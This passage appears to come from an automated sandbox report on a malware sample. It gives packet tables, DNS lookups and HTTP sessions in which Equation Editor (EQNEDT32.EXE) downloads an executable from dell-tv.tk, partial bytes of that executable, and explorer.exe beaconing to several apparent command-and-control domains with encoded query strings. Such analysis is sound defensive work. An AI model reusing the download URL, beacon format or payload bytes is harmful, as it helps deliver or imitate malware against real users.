                                                            Nov 25, 2021 18:08:44.275574923 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.275589943 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.275603056 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.275794029 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.303333044 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.303376913 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.303389072 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.303400993 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.303653002 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.303698063 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.303704977 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.303709030 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.331322908 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.331350088 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.331362009 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.331511974 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.331547976 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.331553936 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.359025955 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.359292984 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.360531092 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.360551119 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.360658884 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.360683918 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.386936903 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.387109995 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.388048887 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.388144970 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.407561064 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.407804012 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.415594101 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.415684938 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.435270071 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.435326099 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.443090916 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.443114042 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.443145990 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.443166971 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.462941885 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.463006973 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.470788002 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.470961094 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.490593910 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.490789890 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.498509884 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.498605013 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.518291950 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.518362045 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.526201010 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.526313066 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.545850992 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.545912027 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:44.553791046 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:44.553865910 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:45.613758087 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:10:31.967025042 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:31.987112045 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:31.987190008 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:31.987536907 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:32.007673025 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:32.106173992 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:32.106223106 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:32.106412888 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:32.106462955 CET4916780192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:32.129015923 CET804916734.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.215019941 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.236938953 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.240163088 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.240250111 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.264972925 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.357868910 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.357903957 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:37.358093977 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.358259916 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.659904957 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.682557106 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:42.421793938 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:42.459237099 CET8049169172.67.184.102192.168.2.22
                                                            Nov 25, 2021 18:10:42.459439039 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:42.459754944 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:42.497267008 CET8049169172.67.184.102192.168.2.22
                                                            Nov 25, 2021 18:10:43.044056892 CET8049169172.67.184.102192.168.2.22
                                                            Nov 25, 2021 18:10:43.044106007 CET8049169172.67.184.102192.168.2.22
                                                            Nov 25, 2021 18:10:43.044435978 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:43.044490099 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:43.081934929 CET8049169172.67.184.102192.168.2.22

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 18:08:39.086638927 CET5216753192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:08:39.124274969 CET53521678.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:26.811336994 CET5780553192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:26.902570963 CET53578058.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:31.908102989 CET5903053192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:31.964771032 CET53590308.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:37.156733990 CET5918553192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:37.213021040 CET53591858.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:42.365734100 CET5561653192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:42.420614958 CET53556168.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:48.059755087 CET4997253192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:48.129635096 CET53499728.8.8.8192.168.2.22

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Nov 25, 2021 18:08:39.086638927 CET192.168.2.228.8.8.80x2206Standard query (0)dell-tv.tkA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:26.811336994 CET192.168.2.228.8.8.80xfc43Standard query (0)www.bandhancustomer.comA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:31.908102989 CET192.168.2.228.8.8.80x9c63Standard query (0)www.texaszephyr.comA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:37.156733990 CET192.168.2.228.8.8.80x30e0Standard query (0)www.publicfigure.skinA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:42.365734100 CET192.168.2.228.8.8.80x9037Standard query (0)www.volunteervabetweenk.comA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:48.059755087 CET192.168.2.228.8.8.80xce43Standard query (0)www.1oavyx.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Nov 25, 2021 18:08:39.124274969 CET8.8.8.8192.168.2.220x2206No error (0)dell-tv.tk37.0.9.166A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:31.964771032 CET8.8.8.8192.168.2.220x9c63No error (0)www.texaszephyr.comtexaszephyr.comCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 18:10:31.964771032 CET8.8.8.8192.168.2.220x9c63No error (0)texaszephyr.com34.102.136.180A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:37.213021040 CET8.8.8.8192.168.2.220x30e0No error (0)www.publicfigure.skinpublicfigure.skinCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 18:10:37.213021040 CET8.8.8.8192.168.2.220x30e0No error (0)publicfigure.skin34.102.136.180A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:42.420614958 CET8.8.8.8192.168.2.220x9037No error (0)www.volunteervabetweenk.com172.67.184.102A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:42.420614958 CET8.8.8.8192.168.2.220x9037No error (0)www.volunteervabetweenk.com104.21.32.75A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:48.129635096 CET8.8.8.8192.168.2.220xce43Name error (3)www.1oavyx.comnonenoneA (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • dell-tv.tk
                                                            • www.texaszephyr.com
                                                            • www.publicfigure.skin
                                                            • www.volunteervabetweenk.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.224916537.0.9.16680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 18:08:39.172686100 CET0OUTGET /ashlyzx.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: dell-tv.tk
                                                            Connection: Keep-Alive
                                                            Nov 25, 2021 18:08:39.202337980 CET2INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 25 Nov 2021 17:08:39 GMT
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 560128
                                                            Last-Modified: Thu, 25 Nov 2021 01:30:41 GMT
                                                            Connection: keep-alive
                                                            ETag: "619ee741-88c00"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 e5 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 80 08 00 00 0a 00 00 00 00 00 00 16 9f 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 9e 08 00 4f 00 00 00 00 a0 08 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 7f 08 00 00 20 00 00 00 80 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 08 00 00 08 00 00 00 82 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 8a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9e 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b8 21 01 00 03 00 00 00 8c 01 00 06 64 6a 02 00 60 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a 0d 07 09 6f 77 02 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa0 @ @Op H.textt `.rsrcp@@.reloc@BHH!dj`4s}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#(1{o#(2rp(3(4s5{o(8()ow
                                                            Nov 25, 2021 18:08:39.202358961 CET3INData Raw: 06 6f 36 00 00 0a 07 1f 20 6f 37 00 00 0a 07 09 6f 76 02 00 06 6f 36 00 00 0a 09 6f 75 02 00 06 6f 17 00 00 0a 13 04 2b 35 11 04 6f 14 00 00 0a 13 05 07 1f 20 6f 37 00 00 0a 11 05 7b 98 01 00 04 2d 09 07 15 6f 36 00 00 0a 2b 12 07 11 05 7b 98 01
                                                            Data Ascii: o6 o7ovo6ouo+5o o7{-o6+{o8o6o-,oo9(*:ko,o*(~BD80{o#(1{o#
                                                            Nov 25, 2021 18:08:39.202399969 CET4INData Raw: 59 00 00 0a 02 7b 0d 00 00 04 20 f6 00 00 00 20 68 01 00 00 73 72 00 00 0a 6f 50 00 00 0a 02 7b 0d 00 00 04 20 94 00 00 00 6f 87 00 00 0a 02 7b 0d 00 00 04 18 6f 88 00 00 0a 02 7b 0d 00 00 04 1a 6f 73 00 00 0a 02 7b 0e 00 00 04 1f 54 1f 0a 73 6f
                                                            Data Ascii: Y{ hsroP{ o{o{os{Tsoop{rpoq{VGsroP{o{o{so{9soop{rpoq{;sroP{os
                                                            Nov 25, 2021 18:08:39.202477932 CET6INData Raw: 00 00 0a 0a 03 06 16 16 6f 74 02 00 06 de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 01 10 00 00 02 00 45 00 0b 50 00 0a 00 00 00 00 13 30 04 00 d2 01 00 00 0a 00 00 11 12 00 0f 02 28 9e 00 00 0a 03 6f 05 02 00 06 6f e9 01 00 06 6f 43 00 00 0a 5b 0f
                                                            Data Ascii: ot,o*EP0(oooC[(oooC[(oo(,!((-}}*oooos}oooos}( _9
                                                            Nov 25, 2021 18:08:39.202503920 CET7INData Raw: 00 06 7d 1f 00 00 04 02 02 7b 1e 00 00 04 02 7b 1f 00 00 04 73 b3 00 00 0a 7d 1d 00 00 04 03 6f 75 02 00 06 6f 17 00 00 0a 0a 2b 24 06 6f 14 00 00 0a 0b 02 7b 1d 00 00 04 07 7b 96 01 00 04 07 7b 97 01 00 04 07 7b 98 01 00 04 28 b4 00 00 0a 06 6f
                                                            Data Ascii: }{{s}ouo+$o{{{{(o-,oowoxZovoxZsM((('(Fot,os} *A0q0o(,
                                                            Nov 25, 2021 18:08:39.202521086 CET8INData Raw: 72 6d 02 00 70 28 c1 00 00 0a 6f c2 00 00 0a 0a 06 2c 5e 03 72 7b 02 00 70 28 c1 00 00 0a 6f c2 00 00 0a 0b 07 2d 0f 02 06 04 28 c3 00 00 0a 28 3f 00 00 06 2b 1f 04 07 6f c4 00 00 0a 28 34 00 00 0a 28 c5 00 00 0a 0c 02 06 08 28 c6 00 00 0a 28 3f
                                                            Data Ascii: rmp(o,^r{p(o-((?+o(4(((?(>oAs(*2(>o*{**"}**0}'(R(H(Co>}(sQ%{(ooX%{(ooV})
                                                            Nov 25, 2021 18:08:39.202670097 CET10INData Raw: 0b 06 6f ee 00 00 0a 6f f2 00 00 0a 06 6f 13 00 00 0a 2d ed de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 00 01 10 00 00 02 00 0c 00 17 23 00 0a 00 00 00 00 1e 02 28 66 00 00 06 2a 7e 02 7b 34 00 00 04 03 6f e8 00 00 0a 03 02 fe 06 69 00 00 06 73 ef
                                                            Data Ascii: ooo-,o*#(f*~{4oiso*F(_,(j*Z{2,{2o*z,{6,{6o(*2s}6*f(}8s}7*{8X}8{7{8o(q*
                                                            Nov 25, 2021 18:08:39.202744961 CET11INData Raw: 06 01 00 0a 02 16 28 98 00 00 0a 2a 1e 02 28 9b 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 9a 02 03 7d 51 00 00 04 02 28 a0 00 00 06 02 7b 55 00 00 04 02 7b 51 00 00 04 18 2e 03 17 2b 01 16 6f 07 01 00 0a 2a 46 02 7b 62 00 00 04 6f 08 01 00 0a 28 09 01
                                                            Data Ascii: (*(*{Q*}Q({U{Q.+o*F{bo(*J{b(o*F{Xoo*6{Xo*F{Yoo*6{Yo*F{\o(*J{\(o*F{]o(*J{](o*
                                                            Nov 25, 2021 18:08:39.230190992 CET13INData Raw: 04 72 79 01 00 70 6f 71 00 00 0a 02 7b 54 00 00 04 1f 47 1f 0d 73 72 00 00 0a 6f 50 00 00 0a 02 7b 54 00 00 04 16 6f 73 00 00 0a 02 7b 54 00 00 04 72 49 04 00 70 6f 78 00 00 0a 02 7b 55 00 00 04 17 6f dc 00 00 0a 02 7b 55 00 00 04 6f 13 01 00 0a
                                                            Data Ascii: rypoq{TGsroP{Tos{TrIpox{Uo{Uo#%rgp%rpo"{U\soop{Urpoq{URsroP{Uos{Us\o#{V-soop{Vrpoq{VN
                                                            Nov 25, 2021 18:08:39.230221033 CET14INData Raw: 50 00 00 0a 02 7b 61 00 00 04 1f 0d 6f 73 00 00 0a 02 7b 61 00 00 04 72 b1 05 00 70 6f 78 00 00 0a 02 7b 62 00 00 04 20 f3 00 00 00 1f 09 73 6f 00 00 0a 6f 70 00 00 0a 02 7b 62 00 00 04 1a 8d 99 00 00 01 25 16 17 9e 73 26 01 00 0a 6f 27 01 00 0a
                                                            Data Ascii: P{aos{arpox{b soop{b%s&o'{brpoq{b$sroP{bos{b%s&o{c soop{crpoq{c=sroP{cos{crp
                                                            Nov 25, 2021 18:08:39.230232954 CET16INData Raw: 39 4d 01 00 00 08 7b 16 01 00 0a 1e 5a 0d 08 7b 19 01 00 0a 1f 10 5a 09 58 13 04 08 7b 1a 01 00 0a 1f 10 5a 09 58 13 05 08 7b 1b 01 00 0a 17 40 93 00 00 00 0e 04 08 7b 17 01 00 0a 6f 35 01 00 0a 6f 36 01 00 0a 0e 04 08 7b 18 01 00 0a 6f 35 01 00
                                                            Data Ascii: 9M{Z{ZX{ZX{@{o5o6{o5o7;{o5o8X{o5o8X{o5o6{o5o7(8{o5o9{o5o8.e{


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 18:10:31.987536907 CET593OUTGET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1
                                                            Host: www.texaszephyr.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 18:10:32.106173992 CET593INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 17:10:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "618be75c-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 18:10:37.240250111 CET594OUTGET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1
                                                            Host: www.publicfigure.skin
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 18:10:37.357868910 CET594INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 17:10:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "618be75c-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.2249169172.67.184.10280C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 18:10:42.459754944 CET595OUTGET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1
                                                            Host: www.volunteervabetweenk.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 18:10:43.044056892 CET596INHTTP/1.1 404 Not Found
                                                            Date: Thu, 25 Nov 2021 17:10:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            vary: Accept-Encoding
                                                            cache-control: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6b3c7df37c1c4230-AMS
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Code Manipulations

